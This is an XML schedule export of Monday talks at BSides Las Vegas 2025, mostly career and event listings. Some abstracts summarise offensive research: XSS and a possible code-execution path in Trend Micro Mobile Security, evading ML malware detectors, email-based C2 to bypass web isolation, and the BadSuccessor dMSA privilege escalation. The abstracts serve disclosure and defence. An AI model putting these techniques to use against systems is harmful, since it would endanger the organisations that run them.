<?xml version='1.0' encoding='utf-8' ?>
<iCalendar xmlns:pentabarf='http://pentabarf.org' xmlns:xCal='urn:ietf:params:xml:ns:xcal'>
    <vcalendar>
        <version>2.0</version>
        <prodid>-//Pentabarf//Schedule//EN</prodid>
        <x-wr-caldesc></x-wr-caldesc>
        <x-wr-calname></x-wr-calname>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>PBHVUK@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-PBHVUK</pentabarf:event-slug>
            <pentabarf:title>Opening Remarks, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T093000</dtstart>
            <dtend>20250804T093100</dtend>
            <duration>000100</duration>
            <summary>Opening Remarks, Monday</summary>
            <description>Opening Remarks, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/PBHVUK/</url>
            <location>Florentine A</location>
            
            <attendee>milqtst</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>VSF8QE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-VSF8QE</pentabarf:event-slug>
            <pentabarf:title>From Me to We</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T093000</dtstart>
            <dtend>20250804T100000</dtend>
            <duration>003000</duration>
            <summary>From Me to We</summary>
            <description>Outline (internal only)</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/VSF8QE/</url>
            <location>Florentine A</location>
            
            <attendee>Bryson Bort</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>D9GABH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-D9GABH</pentabarf:event-slug>
            <pentabarf:title>Who Scans the Scanner? Exploiting Trend Micro Mobile Security</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T100000</dtstart>
            <dtend>20250804T104500</dtend>
            <duration>004500</duration>
            <summary>Who Scans the Scanner? Exploiting Trend Micro Mobile Security</summary>
            <description>This talk is the result of hands-on vulnerability research focused on Trend Micro’s enterprise-grade mobile security solution, TMMS. The project began with a simple question: Can the tools used to protect mobile devices be turned against themselves? That curiosity led to a series of discoveries, two of which Trend Micro acknowledged as confirmed security issues.

The first vulnerability centers on unauthenticated access to TMMS&#x27;s device report pages. These pages expose scan histories, app inventories, and device status, all accessible without any form of authentication. This flaw represents a significant breach of confidentiality, offering an attacker valuable insights about an organization’s device fleet and security posture.

Digging deeper, I found that these unauthenticated reports also served as a perfect delivery channel for a stored cross-site scripting attack. By modifying the name of an app on an enrolled Android agent, a value later displayed in the web console, I was able to inject JavaScript directly into the report page. Since this page is rendered without sanitization and without login, the script executes in the browser of any administrator or user who accesses it.

The final and most technically complex finding lies within the TMMS Android agent. While inspecting its scan routines via reverse engineering and dynamic testing, I identified a potential path to code execution. By altering function parameters in memory during an antivirus scan, it may be possible to invoke unintended behavior, including spawning a reverse shell. Although Trend Micro has not confirmed this issue, preliminary results suggest the feasibility of remote command execution through controlled memory manipulation, especially if initiated from a compromised server or malicious agent.

My talk will take attendees through each phase of the research: from initial reconnaissance and passive analysis to deeper reverse engineering of the Android APK and memory manipulation during runtime. I will demonstrate how these flaws intersect and discuss the viability of chaining them into a full exploit path. The narrative will include recorded demos, such as viewing a report without credentials, triggering XSS via Android scan, and memory patching leading to command execution, to help make the technical impact tangible.

Beyond showcasing vulnerabilities, I’ll reflect on disclosure, vendor response, and the implications for other mobile security products. Attendees will leave with a deeper appreciation for the risks hidden in trusted software, as well as techniques they can apply to analyze similar solutions.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/D9GABH/</url>
            <location>Florentine A</location>
            
            <attendee>Lucas Carmo</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>C9FNXW@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-C9FNXW</pentabarf:event-slug>
            <pentabarf:title>Creating the Torment Nexus: Using Machine Learning to Defeat Machine Learning</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T110000</dtstart>
            <dtend>20250804T112000</dtend>
            <duration>002000</duration>
            <summary>Creating the Torment Nexus: Using Machine Learning to Defeat Machine Learning</summary>
            <description>This talk was in collaboration with a colleague when working at Dropbox; we wondered whether we could easily bypass AI malware detection methods.
After spending three months researching the possibilities, I found that with only minor non-code changes that do not affect the functionality of the executable, we were able to reduce detection by ~99.9998% for well-known malware samples, as well as ~20-30% with VirusTotal results. This discovery shocked us by how easy and simple it was to perform. As malware detection tools start to incorporate machine learning in their product, we hope that this talk can demonstrate that doing so requires heavy scrutiny and careful planning in order to not introduce greater vulnerabilities. This talk will demonstrate how the research was done to enable attendees to continue this research on their own.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/C9FNXW/</url>
            <location>Florentine A</location>
            
            <attendee>Noah Grosh</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TMTNLQ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TMTNLQ</pentabarf:event-slug>
            <pentabarf:title>The Scene is Dead</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T113000</dtstart>
            <dtend>20250804T121500</dtend>
            <duration>004500</duration>
            <summary>The Scene is Dead</summary>
            <description>I&#x27;ve been researching English speaking cybercrime for most of my entire career, since long before they started to self-identify as &quot;the com&quot;, and I&#x27;m going to discuss the patterns I noticed across more than a decade of work. This stuff has implications for child safety, infosec work, and the wellbeing of the next generation of workers in the infosec industry.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TMTNLQ/</url>
            <location>Florentine A</location>
            
            <attendee>Allison Nixon</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>LUY3SR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-LUY3SR</pentabarf:event-slug>
            <pentabarf:title>My friend Ben: solid employee, DPRK agent</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T140000</dtstart>
            <dtend>20250804T144500</dtend>
            <duration>004500</duration>
            <summary>My friend Ben: solid employee, DPRK agent</summary>
            <description>## Act I: /r/paycheck: The pandemic and the rise of overemployment schemes.
So we had a global pandemic. We all went home. Employers everywhere touted how productive and amazing teams were working remotely. We bought ring lights. We arranged books we never read by color on bookshelves behind our desks. We realized we could get jobs at four different firms simultaneously and outsource our work overseas to four different people. We touched grass and made sourdough loaves. This is where we start our story.

### In this section:
**1. Rational actors and their covert subcontractors.** Discussion of the abuses seen in remote work pre-pandemic, typically through illicit subcontracting, which is still endemic in tech. We’ll discuss the economics of the incentive model in the world of contractors. This laid the groundwork for various forms of workforce infiltration, including my friend Ben.
**2. Exploit hiring practices with this one weird trick.** We will document the rise of overemployment or job stacking, which exploits weaknesses in typical corporate management styles. The combination of managers’ inability to identify low-performers, and HR’s requirements over progressive discipline pretty much guarantee 9-12 months of income for little effort. This realization is not lost on North Korea.


## Act II: My friend Ben: Understanding the threat of workforce infiltration.
*(CFP NOTE: This is a TLP:CLEAR discussion. This part of the talk is where I have to be very careful about how I handle public and nonpublic intel – there’s a TLP:RED analogue of this I can’t give in a venue like bslv. I want to be clear with the committee that everything in this section is the result of direct experience or public intel, and I will be changing some details to prevent jeopardizing ongoing LE operations or revealing information that needs to stay confidential.)*

**1. Meet Ben, senior software engineer.** “Ben” is a persona. “Ben” has the stolen identity of a real person, including name, address and social security number. I will be highlighting what I know about this persona, including:
a. Common failures in background check and job history reporting.
b. Fabulist resumes that don’t quite seem too good to be true, but good enough to make him stand out from the crowd.
c. Location discrepancies – Ben always seems to move right after he gets a job and fills out the payroll paperwork.
d. What Ben’s like as a co-worker. I discuss how his co-workers and manager saw him as a staff member and teammate. Something was always a bit “off” but work was getting done.

**2. Meet Ben, DPRK-affiliated actor.** Ben may have eventually run into issues due to some of his work style quirks, but unbeknownst to him, a team responsible for managing Insider Risk was on the hunt for his workplace predecessors, the subs and stackers.
     a. In this section, I’ll talk about how Ben was found, via technical means used to identify people subcontracting their work, or job stackers who allowed sensitive data to cross outside of organizational boundaries.
     b. Once Ben is identified for who he is, my teams made uncovering OSINT about him a full-blown sport. I’ll describe how we learned more about him, his interests and how we found other alternate identities.

**3. Ben’s supporting cast:** In this section, I will provide a technical overview of:
a. Laptop farms and how they operate
b. The use of on-shore sketchy datacenters for VPN tunneling
c. The type of people who operate laptop farms and how they’re recruited.
d. What we learned doing OSINT on a domestic-side farmer who doesn’t seem to have DPRK-level training in opsec.

**4. So you’ve met your own Ben, now what?** Safely eradicating DPRK actors. This is where I want to equip people to handle situations like this, based on what I have learned directly and through discussions with industry peers hunting DPRK. This includes equipment bricking and recovery, working with your hapless contract hire firm, and coordinating with internal partners on response.


## Act III: Trust Issues: Helping people bring their authentic selves to work. 
*(This is where I’m going to switch to direct actions organizations can take to reduce their risk in this space.)*
**1. Hiring, identity proofing, authentication tips.** We will talk about typical processes for establishing a person’s identity and why most are not strong enough to prevent impersonation. We will discuss ways to improve processes, the cost / friction these methods introduce and how to navigate this in your organization.

**2. Technical indicators:** These are much weaker indicators for DPRK, but can prove valuable in identifying stackers and subs. This includes things like remote access tooling, abnormal collaboration patterns, peer network topologies and hunting for out of band equipment, such as IP-based KVMs.

**3. Presentation wrap-up, attendee to-do list.** This is where I answer the questions like “where do I get started?” and “what’s the most effective methods for improving our processes?” This includes:
a. Equipment shipping logistics red flags
b. Supplier engagement
c. Internal stakeholder education and partnership.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/LUY3SR/</url>
            <location>Florentine A</location>
            
            <attendee>Chris Merkel</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>REVYEP@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-REVYEP</pentabarf:event-slug>
            <pentabarf:title>Shedding Light on Web Isolation Technologies and Their Bypass Techniques: C2 Communication via Outlook Using SMTP and IMAP</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend>20250804T154500</dtend>
            <duration>004500</duration>
            <summary>Shedding Light on Web Isolation Technologies and Their Bypass Techniques: C2 Communication via Outlook Using SMTP and IMAP</summary>
            <description>Web isolation is a technology that enhances security by eliminating the need for workstation HTTP/HTTPS communication. During my experience as a SOC Analyst in a web isolation environment, many alerts were closed due to the blocking of HTTP/HTTPS traffic by firewalls. For instance, typical attacks like macro-enabled Word documents that download malware over HTTP can be entirely blocked by firewalls. This security solution is sometimes used by organizations such as banks, hospitals, and local governments that are large, long-established, and handle sensitive information.

In web isolation environments, one of the few outbound communication methods permitted by firewalls is email. However, tools that leverage email for C2 communication are uncommon, and therefore attract less attention compared to C2 traffic over HTTPS or DNS. As a result, they are sometimes overlooked by security teams and solutions. This presentation will demonstrate a C2 tool that uses email to show a viable threat scenario, even in web-isolated environments.

The presentation will cover the following topics:

1. Web Isolation Technology
- Overview of Web Isolation Technology
- Threats and not threats for web-isolated environments

2. Actors and attack techniques utilizing SMTP/IMAP

- Email collection techniques/Agent Tesla/Emotet/APT28
- C2 Tools which use SMTP/IMAP

3. Introduction and demonstration of the developed tool
- Demo video
- Comparison with general reverse shells
- Detection results of AV/EDR products

4. Detection and mitigation
- Setting to prevent this attack
- Sigma rule and Splunk, Elastic, and EDR solutions</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/REVYEP/</url>
            <location>Florentine A</location>
            
            <attendee>Terada Yu</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>EMFVKN@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-EMFVKN</pentabarf:event-slug>
            <pentabarf:title>The (Un)Rightful Heir: My dMSA Is Your New Domain Admin</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend>20250804T174500</dtend>
            <duration>004500</duration>
            <summary>The (Un)Rightful Heir: My dMSA Is Your New Domain Admin</summary>
            <description>This research started as a curiosity: how do delegated Managed Service Accounts (dMSAs) really work under the hood in Windows Server 2025? What began as a weekend project led to the discovery of a novel attack path.

The talk introduces BadSuccessor, an attack technique that lets an attacker get the permissions of any user, including Domain Admins or Domain Controllers, and retrieve their Kerberos keys - all by using a newly created dMSA. No existing dMSAs needed, no membership changes, and no alterations to the legitimate account.

We’ll go through the discovery process, what are dMSAs, how migration from an old service account to a dMSA works, and how this logic can be used to get privileged tickets. We’ll also share practical detection ideas, plus pre- and post-exploitation tips for both red and blue teams.

Live demos will be pre-recorded for reliability. The goal is to make every part of the technique clear and repeatable for defenders, researchers, and red teamers alike.

Whitepaper: https://docs.google.com/document/d/1ac4qRSgVrFSCnQrBbgj-6VscOKU5mtIIVYEVjdbIzrY/edit?usp=sharing</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/EMFVKN/</url>
            <location>Florentine A</location>
            
            <attendee>Yuval Gordon</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>LBQDEB@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-LBQDEB</pentabarf:event-slug>
            <pentabarf:title>Detecting, Deobfuscating, and Preventing Obfuscated Script Execution with Tree-sitter</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T180000</dtstart>
            <dtend>20250804T184500</dtend>
            <duration>004500</duration>
            <summary>Detecting, Deobfuscating, and Preventing Obfuscated Script Execution with Tree-sitter</summary>
            <description>The research in this talk has been developed over the past year and a half, and I presented early iterations of this research at BSides SATX and BSides Austin in 2024. The basic premise behind it is that tree-sitter provides a unified API through which we can parse, query, traverse, and manipulate syntax trees in a plethora of different languages, allowing us to develop new kinds of scanning engines and deobfuscation toolkits. This talk greatly expands upon that research with the inclusion of a from-scratch AMSI provider DLL written in Rust that preprocesses obfuscated PowerShell scripts and can be configured to either block script execution entirely or to pass the deobfuscated results up the chain for further scanning by other providers on the system. This new AMSI provider also implements a custom Event Tracing for Windows (ETW) trace logging provider that logs the deobfuscated contents, allowing threat hunters and incident responders to have an instantaneous look at the deobfuscated script contents that takes script block logging to an entirely new level. This AMSI provider and its associated research has not been discussed or shown at any other conference, and BSidesLV will be the first public demonstration and discussion of it, if the talk were to be accepted.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/LBQDEB/</url>
            <location>Florentine A</location>
            
            <attendee>David McDonald</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>NDRTXH@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-NDRTXH</pentabarf:event-slug>
            <pentabarf:title>From Help Desk to CISO</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T100000</dtstart>
            <dtend>20250804T104500</dtend>
            <duration>004500</duration>
            <summary>From Help Desk to CISO</summary>
            <description>In the rapidly evolving field of cybersecurity, the journey from an entry-level IT role to a leadership position like Chief Information Security Officer (CISO) can be both challenging and rewarding. This talk, inspired by the career trajectory of Nicholas Carroll, a CISM certified Cybersecurity Instructor and former CISO, aims to provide a roadmap for those aspiring to climb the cybersecurity career ladder.

The talk will begin with an overview of Nicholas Carroll&#x27;s career, highlighting his transition from an IT Helpdesk role to a CISO. The talk will also highlight how skills gained outside of IT and cyber can help translate to success in technical fields whether it be troubleshooting as a mechanic, customer service skills in retail, and beyond. This real-life example will serve as a testament to the possibilities that exist within the field of cybersecurity, demonstrating that with dedication, continuous learning, and the right opportunities, one can rise from an entry-level position to a leadership role.

One of the key takeaways from this talk will be the importance of continuous learning and certifications in advancing one&#x27;s career. Staying up-to-date with the latest trends, technologies, and threats is crucial. Certifications like CompTIA Security+, Certified Information Systems Security Professional (CISSP), and Certified Information Security Manager (CISM) not only validate one&#x27;s skills but also open doors to new opportunities. We’ll also discuss the pitfalls and limitations of certifications and how to balance the pursuit of continuous education in cost effective ways throughout a career.

The talk will delve into career guidance toolsets including the Cyber Career Pathways Tool, a resource developed by the Cybersecurity and Infrastructure Security Agency (CISA). This tool helps individuals understand the tasks, knowledge, and skills they need to advance in their cyber careers. It provides a clear roadmap for progression, from entry-level roles to intermediate and advanced positions.
Another major takeaway will be the importance of hands-on experience. While theoretical knowledge is important, practical experience is what truly sets one apart. Attendees will learn about the value of internships, co-op programs, and entry-level positions in gaining this experience. Especially in a time when it feels like even entry level cyber jobs require years of experience. They will also learn about the role of projects and contributions to open-source platforms in demonstrating their skills to potential employers and ways to highlight experience outside of cyber in ways that can translate to success in cyber career pathways.

The talk will also emphasize the importance of soft skills in advancing one&#x27;s career. As one moves up the ladder, skills like communication, leadership, and strategic thinking become increasingly important. Drawing from Nicholas Carroll&#x27;s experience, the talk will provide tips on how to develop these skills and use them to influence decision-making and drive cybersecurity initiatives within an organization.
The talk will conclude with practical recommendations for those looking to move up in their careers. Attendees will learn about the importance of mentorship and networking in opening doors to new opportunities. They will also gain insights into how to navigate the challenges that come with transitioning to new roles, and how to position themselves for leadership positions, even if they’re just starting out.

In summary, &quot;From Help Desk to CISO&quot; is a comprehensive guide for anyone looking to advance their career in cybersecurity. Attendees will leave with a clear understanding of the steps they can take to move up the career ladder, and the tools and resources they can leverage to achieve their career goals.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/NDRTXH/</url>
            <location>Florentine B</location>
            
            <attendee>Nicholas Carroll</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>7RCPG9@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-7RCPG9</pentabarf:event-slug>
            <pentabarf:title>Hack Your Network: Career Connections for Cyber Pros</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T110000</dtstart>
            <dtend>20250804T112000</dtend>
            <duration>002000</duration>
            <summary>Hack Your Network: Career Connections for Cyber Pros</summary>
            <description>In the competitive world of cybersecurity, building a professional network is more than just a nice-to-have—it’s essential for career growth. While many professionals understand the importance of networking, they often focus too much on self-promotion rather than relationship-building. This session will focus on how to approach networking with authenticity, with the goal of building genuine connections that can lead to future job opportunities, collaborations, and career advancement.
Participants will learn about the best practices for networking at events like BSides, where like-minded cybersecurity professionals gather to share knowledge and forge new relationships. Attendees will also explore strategies for using LinkedIn and other social media platforms to connect with industry leaders, while maintaining an authentic and helpful presence online.
Mentorship plays a crucial role in career development, and this session will guide participants on how to find a mentor, engage in meaningful mentor-mentee relationships, and benefit from those connections. The session will also discuss the long-term nature of networking, emphasizing how to stay engaged with your professional network over time and continue adding value to others’ careers.
By the end of the session, participants will walk away with actionable tips for building and maintaining a strong professional network that supports their growth as cybersecurity professionals.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-20m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/7RCPG9/</url>
            <location>Florentine B</location>
            
            <attendee>Heather Morris</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>DQZHHX@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-DQZHHX</pentabarf:event-slug>
            <pentabarf:title>Hire Ground Resume Reviews, Monday Lunch Break</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T130000</dtstart>
            <dtend></dtend>
            <duration>010000</duration>
            <summary>Hire Ground Resume Reviews, Monday Lunch Break</summary>
            <description>Hire Ground Resume Reviews, Monday Lunch Break</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/DQZHHX/</url>
            <location>Florentine B</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>8BKV37@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-8BKV37</pentabarf:event-slug>
            <pentabarf:title>Where’s Waldo? Why Recruiters Can’t Find You (and What To Do About It)</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T140000</dtstart>
            <dtend>20250804T144500</dtend>
            <duration>004500</duration>
            <summary>Where’s Waldo? Why Recruiters Can’t Find You (and What To Do About It)</summary>
            <description>This is not a presentation. It’s a live, practical experience where the audience drives the session and learns by doing.

Attendees will step into the recruiter’s seat and experience what it’s like to search for cybersecurity talent. I’ll run a real-time LinkedIn search using a job title and location chosen by the audience. We’ll review the profiles that show up, vote on who stands out, and talk through what worked and what didn’t. Along the way, I’ll explain how recruiters actually search using filters, keywords, and shortcuts most people never see.

Most professionals don’t realise how easy it is to be invisible. They’ve got solid experience, but their titles are unclear, their profiles don’t reflect how hiring teams think, and they’re missing the signals that matter. This session is designed to close that gap.

We’ll also run a live fix challenge using real profiles. It’s honest, interactive, and focused on action. The goal is for people to walk out of the room saying, “Now I understand what’s missing and how to fix it.”
I’ve spent over 9 years in cybersecurity recruitment, helping companies hire and helping people get hired. This session brings that experience to life in a way that is engaging, direct, and built for real impact.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/8BKV37/</url>
            <location>Florentine B</location>
            
            <attendee>Ricki Burke</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>SWUABJ@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-SWUABJ</pentabarf:event-slug>
            <pentabarf:title>Craps, Clout, and Career Chaos: The Game They Forgot to Explain</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T150000</dtstart>
            <dtend></dtend>
            <duration>004500</duration>
            <summary>Craps, Clout, and Career Chaos: The Game They Forgot to Explain</summary>
            <description>In cybersecurity, career growth is more than just technical skill—it’s about communication, visibility, and learning how to navigate organizational structures and politics. This dual-perspective presentation brings together the candid insights of a cybersecurity senior manager and a CISO, reflecting on the parallel (and sometimes diverging) paths they’ve taken.
We will give real advice, honest stories of missteps, unexpected opportunities, and lessons learned the hard way. We’ll explore what it really takes to move forward in your cybersecurity career—from gaining trust and visibility to aligning with leadership’s expectations. Attendees will leave with actionable strategies for getting noticed, getting promoted, and making the leap from “getting the job done” to driving real influence.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/SWUABJ/</url>
            <location>Florentine B</location>
            
            <attendee>Nicole Beckwith</attendee>
            
            <attendee>Jake Lorz</attendee>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>PERW8U@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-PERW8U</pentabarf:event-slug>
            <pentabarf:title>Hire Ground Resume Reviews, Monday Evening</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T160000</dtstart>
            <dtend>20250804T165000</dtend>
            <duration>005000</duration>
            <summary>Hire Ground Resume Reviews, Monday Evening</summary>
            <description>Free resume reviews in Hire Ground.</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/PERW8U/</url>
            <location>Florentine B</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TQDBBE@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TQDBBE</pentabarf:event-slug>
            <pentabarf:title>Hire Ground Mixer, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T170000</dtstart>
            <dtend>20250804T185000</dtend>
            <duration>015000</duration>
            <summary>Hire Ground Mixer, Monday</summary>
            <description>Hire Ground Mixer, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event2HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/TQDBBE/</url>
            <location>Florentine B</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>SJHWP9@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-SJHWP9</pentabarf:event-slug>
            <pentabarf:title>Silent Auction Opens, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T083000</dtstart>
            <dtend>20250804T083000</dtend>
            <duration>000000</duration>
            <summary>Silent Auction Opens, Monday</summary>
            <description>Silent Auction Opens</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/SJHWP9/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>MU7LC8@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-MU7LC8</pentabarf:event-slug>
            <pentabarf:title>Middle Ground Opens, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T083000</dtstart>
            <dtend>20250804T083000</dtend>
            <duration>000000</duration>
            <summary>Middle Ground Opens, Monday</summary>
            <description>Middle Ground Opens</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Event1HR</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/MU7LC8/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>MYMQJY@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-MYMQJY</pentabarf:event-slug>
            <pentabarf:title>Morning Talks, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T100000</dtstart>
            <dtend></dtend>
            <duration>013000</duration>
            <summary>Morning Talks, Monday</summary>
            <description>Morning Talks, Monday</description>
            <class>PUBLIC</class>
            <status>CONFIRMED</status>
            <category>Talk-45m</category>
            <url>https://pretalx.com/security-bsides-las-vegas-2025/talk/MYMQJY/</url>
            <location>Florentine C+D</location>
            
        </vevent>
        
        <vevent>
            <method>PUBLISH</method>
            <uid>TTNWHR@@pretalx.com</uid>
            <pentabarf:event-id></pentabarf:event-id>
            <pentabarf:event-slug>-TTNWHR</pentabarf:event-slug>
            <pentabarf:title>Lunch Break, Monday</pentabarf:title>
            <pentabarf:subtitle></pentabarf:subtitle>
            <pentabarf:language>en</pentabarf:language>
            <pentabarf:language-code>en</pentabarf:language-code>
            <dtstart>20250804T123000</dtstart>
            <dtend>20250804T140000</dtend>
            <duration>013000</duration>
